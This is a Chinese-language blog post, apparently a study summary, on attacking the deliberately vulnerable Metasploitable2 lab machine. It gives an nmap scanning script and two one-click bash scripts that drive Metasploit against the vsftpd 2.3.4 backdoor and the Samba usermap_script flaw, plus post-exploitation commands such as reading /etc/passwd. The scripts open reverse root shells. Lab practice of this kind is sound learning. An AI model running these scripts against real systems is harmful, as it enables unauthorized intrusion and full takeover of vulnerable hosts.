news 2026/4/15 15:43:30

Metasploitable2(192.168.1.4)渗透测试学习总结(vsftpd + Samba 漏洞)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Metasploitable2(192.168.1.4)渗透测试学习总结(vsftpd + Samba 漏洞)

适用场景:Kali Linux 环境,hexstrike-ai-master 虚拟环境,合法授权靶机 Metasploitable2核心思想:先拿稳定结果,再理解原理;复杂步骤自动化,一键搞定不踩坑

一、前期准备(必做环节,缺一不可)

1. 环境基础验证

  • 确认 Kali 与靶机互通:ping 192.168.1.4(能通才算正常)
  • 关闭 Kali 防火墙:ufw disable(避免拦截反向连接)
  • 激活 hexstrike 虚拟环境(可选,保证工具依赖):

    bash

    运行

    cd ~/hexstrike-ai-master source hexstrike-env/bin/activate
  • 安装必备工具:apt install nmap metasploit-framework -y

2. 信息收集(渗透第一步,先扫后打)

方法:HexStrike 核心逻辑脚本(复刻 AI 扫描)
  1. 创建扫描脚本hexstrike_scan.py

    python

    运行

    import subprocess import sys def hexstrike_ai_scan(target_ip): print(f"=== HexStrike AI 信息收集 - 目标:{target_ip} ===") nmap_cmd = f"nmap -sV -T4 -Pn -p 1-1000 {target_ip}" try: scan_result = subprocess.check_output(nmap_cmd, shell=True, stderr=subprocess.STDOUT, encoding="utf-8") print("扫描结果:\n", scan_result) print("\n【关键漏洞识别】") print("- 21端口 vsftpd 2.3.4:存在后门漏洞(CVE-2011-2523)") print("- 139/445端口 Samba 3.X:存在命令执行漏洞(CVE-2007-2447)") except Exception as e: print(f"扫描失败:{e}") if __name__ == "__main__": hexstrike_ai_scan("192.168.1.4")
  2. 运行脚本获取靶机信息:python3 hexstrike_scan.py
  3. 核心结果提取:记录开放端口和对应服务版本,确定可利用漏洞

二、漏洞利用核心方案:反向 Shell 一键脚本(新手免踩坑)

核心原理

反向 Shell 是靶机主动连接 Kali,无需手动抢时间输入指令,100% 稳定拿 root 权限,是渗透测试的标准操作,比交互 Shell 简单高效。

方案 1:vsftpd 2.3.4 后门漏洞一键脚本

步骤 1:创建脚本文件

bash

运行

nano vsftpd_root_shell.sh
步骤 2:粘贴脚本内容(全自动,零修改)

bash

运行

#!/bin/bash # vsftpd 2.3.4 后门漏洞一键获取 root shell # 自动提取 Kali 本机 IP(eth0 网卡) KALI_IP=$(ip addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | head -n1) # 生成 Metasploit 自动攻击脚本 cat > /tmp/vsftpd_auto.rc << EOF use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 192.168.1.4 set PAYLOAD cmd/unix/reverse_bash set LHOST $KALI_IP set LPORT 9999 set ExitOnSession false # 防止会话自动关闭 run EOF # 执行攻击 echo "=== 开始攻击 vsftpd 漏洞 ===" echo "Kali IP:$KALI_IP | 监听端口:9999" msfconsole -q -r /tmp/vsftpd_auto.rc # 清理临时文件 rm -f /tmp/vsftpd_auto.rc
步骤 3:赋予执行权限

bash

运行

chmod +x vsftpd_root_shell.sh
步骤 4:运行脚本(全程无手动操作)

bash

运行

./vsftpd_root_shell.sh
成功标志

终端出现Command shell session 1 opened,并弹出#提示符,输入whoami输出root即为成功。

后渗透操作(拿到 shell 后执行)

bash

运行

whoami # 查看当前用户(root) ls /root # 查看 root 目录文件 cat /etc/passwd # 查看靶机用户列表 exit # 退出 shell 会话

方案 2:Samba 3.X 命令执行漏洞一键脚本

步骤 1:创建脚本文件

bash

运行

nano samba_root_shell.sh
步骤 2:粘贴脚本内容

bash

运行

#!/bin/bash # Samba 漏洞(CVE-2007-2447)一键获取 root shell KALI_IP=$(ip addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | head -n1) cat > /tmp/samba_auto.rc << EOF use exploit/multi/samba/usermap_script set RHOSTS 192.168.1.4 set PAYLOAD cmd/unix/reverse_bash set LHOST $KALI_IP set LPORT 8888 set ExitOnSession false run EOF echo "=== 开始攻击 Samba 漏洞 ===" echo "Kali IP:$KALI_IP | 监听端口:8888" msfconsole -q -r /tmp/samba_auto.rc rm -f /tmp/samba_auto.rc
步骤 3:赋予权限并运行

bash

运行

chmod +x samba_root_shell.sh ./samba_root_shell.sh
成功标志

同 vsftpd 漏洞,终端弹出#提示符,whoami输出root

三、常见问题与排查(必记,避免踩坑)

问题现象排查方法
脚本运行后无会话建立1. 检查 Kali IP 是否正确(ip addr show eth0)2. 确认靶机 IP 是 192.168.1.43. 换监听端口(如 7777),避免端口冲突
端口被占用查看占用进程:`netstat -tulngrep 端口号<br>杀死进程:kill -9 进程号 `
靶机无法连接 Kali1. 关闭 Kali 防火墙(ufw disable)2. 确认 Kali 与靶机在同一网段
手动输入指令报错放弃手动输入,直接用反向 Shell 一键脚本,根本解决时机问题

四、核心知识点总结(复习重点)

  1. 渗透测试流程:信息收集 → 漏洞识别 → 漏洞利用 → 后渗透 → 清理痕迹
  2. 反向 Shell 优势:靶机主动连 Kali,无需手动交互,会话稳定,新手首选
  3. 脚本万能模板:自动查 IP → 生成 msf 脚本 → 一键运行 → 清理临时文件
  4. 关键注意事项
    • 仅在合法授权靶机操作,禁止攻击非授权设备
    • 每个漏洞用不同监听端口,避免冲突
    • 拿到 shell 后先执行whoami确认权限

五、进阶玩法(适合爱折腾的你)

  1. 脚本菜单整合:把 vsftpd、Samba 脚本整合到一个hack_menu.sh,运行后选数字攻击对应漏洞
  2. 日志记录功能:在脚本中添加>> hack.log,把攻击结果保存到日志文件,方便复习
  3. 多漏洞同时攻击:修改端口号,同时运行多个脚本,获取多个 root shell 会话
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/16 12:04:33

HBuilderX安装教程:实战案例驱动的配置教学

从零开始搭建高效前端开发环境&#xff1a;HBuilderX 安装与配置实战全解析 你是不是也遇到过这种情况——兴冲冲下载了 HBuilderX&#xff0c;解压双击却弹出一堆错误提示&#xff1f;或者明明项目建好了&#xff0c;“运行”按钮一点没反应&#xff0c;控制台还报“未检测到…

作者头像 李华
网站建设 2026/4/14 19:39:40

揭秘AI视觉决策:用PyTorch让深度学习模型“开口说话“

揭秘AI视觉决策&#xff1a;用PyTorch让深度学习模型"开口说话" 【免费下载链接】pytorch-deep-learning Materials for the Learn PyTorch for Deep Learning: Zero to Mastery course. 项目地址: https://gitcode.com/GitHub_Trending/py/pytorch-deep-learning …

作者头像 李华
网站建设 2026/4/11 23:43:00

TensorFlow支持的硬件加速器有哪些?全面对比

TensorFlow支持的硬件加速器有哪些&#xff1f;全面对比 在深度学习模型日益复杂、数据规模持续膨胀的今天&#xff0c;计算效率早已成为AI系统能否落地的关键瓶颈。从手机端的人脸识别到云端的大语言模型训练&#xff0c;不同场景对算力、延迟和能耗的要求千差万别。而作为工业…

作者头像 李华
网站建设 2026/4/12 8:59:55

nteract:5分钟带你玩转交互式数据科学神器

nteract&#xff1a;5分钟带你玩转交互式数据科学神器 【免费下载链接】nteract &#x1f4d8; The interactive computing suite for you! ✨ 项目地址: https://gitcode.com/gh_mirrors/nt/nteract 还在为复杂的数据分析工具头疼吗&#xff1f;nteract这款革命性的交互…

作者头像 李华
网站建设 2026/4/14 17:14:39

【Linux命令大全】001.文件管理之mcopy命令(实操篇)

【Linux命令大全】001.文件管理之mcopy命令&#xff08;实操篇&#xff09; ✨ 本文为Linux系统mcopy命令的全面讲解与实战指南&#xff0c;帮助您掌握在MS-DOS文件系统和Linux系统之间高效传输文件的方法&#xff0c;提升跨平台文件管理能力。 (关注不迷路哈&#xff01;&…

作者头像 李华
网站建设 2026/4/14 2:02:08

从零开始:使用TensorFlow镜像训练第一个神经网络

从零开始&#xff1a;使用TensorFlow镜像训练第一个神经网络 在一台刚装好系统的电脑前&#xff0c;你准备开启深度学习之旅。但还没写一行代码&#xff0c;就卡在了环境配置上&#xff1a;Python 版本不对、CUDA 安装失败、TensorFlow 报错找不到 GPU……这几乎是每个初学者都…

作者头像 李华